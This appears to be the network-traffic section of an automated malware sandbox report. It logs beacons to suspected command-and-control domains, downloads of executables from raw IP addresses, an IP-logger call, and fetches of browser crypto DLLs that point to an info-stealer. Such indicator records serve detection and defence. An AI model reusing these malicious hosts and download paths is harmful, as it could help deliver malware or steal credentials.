Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uafjypcuequr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jurxcotwbxdk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hyyvucskxnak.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://stualialuyastrelia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://delwrkisni.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tjsvjuygyxuqax.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://adfhhawdqcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ydiriiwlnypt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vitkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rglnvctoidbsbe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eegeaka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mneomibvwxl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://noovcjxlu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rfpvesvronsb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qsmyycnofp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hvnltqldsjug.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://isikivavrp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukteugvavlyypgl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qeongox.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rgkncbxujwdmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrddeqqi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mrddeqqi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-host-file8.comData Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 3c 9c 80 05 5f b0 1e 69 e5 0b 46 1a 01 00 e9 f7 e2 38 c6 d3 88 f0 0f 3f 5e 18 74 93 4a 09 e0 19 4b 56 77 8f 76 98 ef 02 af 3f 26 10 6c 93 a8 39 54 4c f7 7b d4 c2 4f 6a d5 c4 71 8c 1a 32 0b ec 2a f0 21 d7 Data Ascii: o=x6zFc47nYki\wu$f]d<_iF8?^tJKVwv?&l9TL{Ojq2*!
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ttudmuiwmsd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://akkgaxko.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nagykeemahie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kstfdv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-host-file8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nhjwecacxpuvxsi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: stualialuyastrelia.net

Source: unknown	TCP traffic detected without corresponding DNS query: 192.36.38.33
Source: unknown	TCP traffic detected without corresponding DNS query: 192.36.38.33
Source: unknown	TCP traffic detected without corresponding DNS query: 192.36.38.33
Source: unknown	TCP traffic detected without corresponding DNS query: 103.253.41.98
Source: unknown	TCP traffic detected without corresponding DNS query: 192.36.38.33
Source: unknown	TCP traffic detected without corresponding DNS query: 192.36.38.33
Source: unknown	TCP traffic detected without corresponding DNS query: 192.36.38.33
Source: unknown	TCP traffic detected without corresponding DNS query: 103.253.41.98
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 212.118.39.73
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.125
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 212.118.39.73
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.125
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.125
Source: unknown	TCP traffic detected without corresponding DNS query: 212.118.39.73
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26
Source: unknown	TCP traffic detected without corresponding DNS query: 192.121.44.26

Source: global traffic	HTTP traffic detected: GET /19nVA4 HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: iplogger.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: zonealarm.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: www.kaspersky.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Connection: Keep-AliveCache-Control: no-cacheHost: usa.kaspersky.com
Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b42239df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 5.42.65.125
Source: global traffic	HTTP traffic detected: GET /ftp/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ftpvoyager.cc
Source: global traffic	HTTP traffic detected: GET /order/tuc5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cream.hitsturbo.com
Source: global traffic	HTTP traffic detected: GET /?format=dfg HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 91.92.254.7Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.35Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /testdownload HTTP/1.1Host: 46.246.96.149User-Agent: httpclientcpp-agent/1.0Accept: /
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/nss3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1Host: 77.91.76.36Cache-Control: no-cache

Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: 820.exe, 00000006.00000002.4435096201.0000000000E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: onualituyrs.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chincenterblandwka.pw

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 18 00 00 00 1f 3d 53 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 8b 3e 6c 0d a7 1b 52 86 af 2f 77 aa 83 0a 43 00 39 77 0d e0 2f 81 e6 89 73 59 a7 7d 68 54 09 6d 9a 1d 31 84 ec ba e2 a7 40 9f 98 15 d4 f0 30 2a 63 2f 26 3c c7 4d 8c 99 39 6c 3d 53 47 c2 9e 39 be 29 8d 28 26 61 f2 3c 8d ce 02 b5 cf 78 62 e5 a5 c1 90 5c 2d ab ee 05 93 38 52 fe 4e 35 05 dc 44 49 ab a0 3f 72 54 62 f6 a4 60 d1 17 4b 2b 97 4b 52 9a 18 6b 6f 52 3a dc ee 4b ce a5 5c 42 10 ea f6 7a fe 3c b9 4c 8c 72 cf 3f 43 a1 b2 6f 0a 0a ca 4e 25 6f 4c 3a 3d b2 5c e8 84 fd bc 6d e2 dc a1 a7 f4 73 93 20 fc 0c 82 88 12 f7 a3 ef 06 14 ad 02 3a 46 8a 0d a9 07 fa 67 45 f6 23 fc 4b 2c be 78 bf 55 36 4c 3d f5 3c 42 3e 7d e8 28 7a 3a 34 d7 41 b4 90 2c a6 59 58 e5 62 09 eb 95 5a b7 ba c5 09 16 be 03 bb 2b 37 b1 3e a1 b3 1b c7 8b ef 77 04 77 3f 6c df 89 82 9b 28 97 e9 b0 ea 24 de c0 49 60 55 8c df 1a 73 e8 78 31 3e 8b 58 94 82 3e 37 59 63 c3 36 e3 3a 2f b3 b6 09 fb 7f f3 8f 1b fc 26 28 bc fd 33 3f 89 5e bf f1 0e 63 62 99 63 9d 20 36 fe f0 a2 86 2c 4b 78 f2 b4 2c d4 ce 13 c4 2d ca 95 3a d9 64 6d 54 b3 5c 76 2c 4e 89 f7 3d 58 4d f5 12 8b 75 0c f8 cd 2b 7d 30 c0 2b fe 21 2a 7f 15 6d 3f 16 9e 01 b5 69 eb 9d ed 8d ee 41 d5 45 24 19 4b 1f 52 f1 9d 79 17 9b a4 e5 ab ea fc 39 44 e6 f0 63 b3 34 62 01 f0 92 0e 5e fc fd 8a c8 9b 10 5f 47 d8 54 31 a2 2b c6 4d 36 cd 60 df d8 4f c5 44 25 78 20 ef 1b 08 ad 5d 35 d1 7a 05 c7 57 dd b3 46 91 4a 01 92 a0 31 f3 b6 5f 99 74 c0 c9 f3 12 b1 02 66 86 b1 ad f1 8b 14 d9 ea 1a 24 e9 4e d1 15 f3 a9 1c c4 16 d5 e6 00 a7 09 17 b6 de 40 6b c3 fd cf f3 3b 5b 4a 76 fb 4d fa 6a d1 2c c1 e0 7e 1b 2b c0 11 6e b8 9d 9a fa 03 03 c5 6c 91 63 12 49 53 b1 0f 30 36 77 1f f7 e6 87 ad 05 de 93 db fc 4e f1 69 be e5 e3 9e e3 56 da ef ef 8a c8 40 39 ae 15 4f ce b3 12 7c 8e 6a 18 41 66 35 99 7e 83 84 08 cd ee cf cd 9b da 0d 58 73 6c 8a 96 03 37 fa 43 43 fe a8 50 75 48 e9 60 17 4c aa 25 df a1 a9 6a b9 d6 d6 a4 62 e8 a9 b7 76 79 f1 50 93 7c 2c e6 d0 49 56 e1 d6 47 59 19 7d 27 84 22 66 13 de 9e 1f a0 7c 85 2b dc ef 24 3b 92 33 8d a6 52 d2 8e 29 80 d0 f3 4f b5 e2 72 22 4d 9a 70 ea 84 bd 7e 69 94 5b c4 f6 01 42 7c ee a7 84 cd 7a 58 39 62 79 cf f7 6f e9 d6 eb 85 59 0e 75 06 d1 04 8d d7 af 40 60 76 57 c4 2d 70 c6 b0 57 ad 50 f1 57 80 a0 a2 04 10 a1 2f 49 6d 26 b4 91 24 df 14 8f b6 65 b1 49 70 9f 31 03 96 8c 54 0a 5b 2c 95 a1 8e bd 1f f3 f5 56 7e 79 48 59 a9 3d 78 ed 6f 4f 33 13 20 7a ad f0 83 08 17 2f f1 27 a6 d0 f2 c0 9d 2a 19 c8 4b 73 42 fb 6d 8e 46 46 5e 76 11 29 3e c1 4b 58 80 22 17 75 a5 9a cb a2 29 73 76 ff 45 a7 3e 33 23 bd eb 32 16 b9 e2 67 6e f1 5c 47 79 b8 5a de 69 7e 2e bf 3c 4d bb fb 2a 1b c5 0c e4 c6 60 15 56 38 18 d5 f9 83 7f a0 63 2f d2 f0 46 65 73 fe 74 89 c7 8b 39 3e db 7d 26 f1 9c 20 e5 d4 19 85 0e 0c 22 4b 08 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f4 ff a9 71 a2 b8 c4 0d 13 13 bf 1e e1 92 c4 08 4c c4 08 a0 c1 a1 61 76 df f5 69 21 11 14 7e 5f af 9a 30 1d c9 a0 c1 a9 dd 7a 0d b0 4f 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9f d4 3f 7c 88 28 c8 48 6e a1 c1 4a 9a 03 fd ec 9e ea 72 af 87 2b bd 61 f7 b5 42 bf 44 34 fd 78 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae 64 9b 03 4c 49 56 ad f3 57 7b 2d ba 72 19 cd 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 e7 50 7b 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 f7 3d 66 49 8b 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 c4 2e e6 5b 1e 44 ab 1e 26 75 10 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 81 7e 90 c7 7d 10 9f c0 ad df b3 99 27 98 8a cd 22 64 74 79 5c 6c 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f d0 56 ab 7a 8f b6 6c e0 cd 28 d8 37 00 52 ff 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
